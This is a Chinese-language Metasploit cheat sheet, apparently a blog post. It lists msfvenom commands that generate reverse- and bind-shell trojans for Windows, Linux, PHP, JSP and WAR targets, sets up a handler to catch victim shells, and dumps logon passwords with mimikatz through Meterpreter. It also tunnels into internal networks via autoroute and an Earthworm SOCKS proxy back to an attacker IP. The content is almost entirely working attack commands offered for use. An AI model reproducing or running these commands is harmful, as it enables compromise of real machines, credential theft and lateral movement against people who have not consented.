MSF-使用备忘录

一.使用msf生成各种类型payload

1.生成win的exe木马文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4433 -f exe >/root/muma.exe

2.生成linux的可执行文件

msfvenom -p linux/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4433 -f elf >/root/muma.elf

注:其中windows和linux后面都可以跟/x86和/x64 (x86是32位,x64是64位)

3.生成php文件的payload

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.10 LPORT=4433 -f raw > shell.php

4.生成jsp文件的payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.10 LPORT=4433 -f raw > shell.jsp

5.生成war文件的payload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.10 LPORT=4433 -f war > shell.war

注:1.reverse_tcp为反向木马,受害机来主动连接我们kali攻击机,可以绕过防火墙
2.但是目标如果不出网或者在内网中就得使用正向木马(bind_tcp),因为受害机找不到我们kali攻击机

msfvenom -p windows/meterpreter/bind_tcp lhost=192.168.1.10 lport=4433 -f exe >/root/muma.exe

二.使用msfconsole来连接木马
1.首先启动msfconsole

root@kali:~# msfconsole

2.使用exploit/multi/handler

msf6 > use exploit/multi/handler
msf6 > show option
msf6 >set payload windows/meterpreter/reverse_tcp
msf6 >set lhost 192.168.1.10
msf6 >set lport 4433
msf6 >run


然后受害机执行木马就可以返回shll了

三.meterpre后渗透模块
1.

meterpreter>ipconfig
meterpreter>ps #查看进程
meterpreter>getuid #查看权限
meterpreter>migrate #迁移进程防止session掉线
meterpreter>load kiwi #导入mimikatz
meterpreter>kiwi_cmd privilege::debug   #提取权限
meterpreter>kiwi_cmd sekurlsa::logonPasswords      #获取密码

读取密码以后就可以进行内网渗透了
可以在msf本身开启代理,先添加路由

meterpreter > run post/multi/manage/autoroute 
meterpreter >run autoroute -p #查看全部路由

可以选择直接在msf里开启socks4代理,msf本身的socks5有bug,不好用

个人建议选择第二种,上传Earthworm (EW)代理,先在kali执行
1.

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

2.在目标机器执行

./ew_for_linux64 -s rssocks -d 192.168.1.10 -e 1234

在后台执行,即使shell掉了也执行

nohup ./ew_for_linux64 -s rssocks -d 192.168.1.10 -e 1234 &

192.168.1.10为kali的ip
3.在kali修改proxychains4配置

vim /etc/proxychains4.conf

修改成一下配置

接下来可以执行代理全局shell,kali执行

root@kali:~# proxychains4 bash #开启全局shell

可以在这个shell里面执行nmap等命令

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值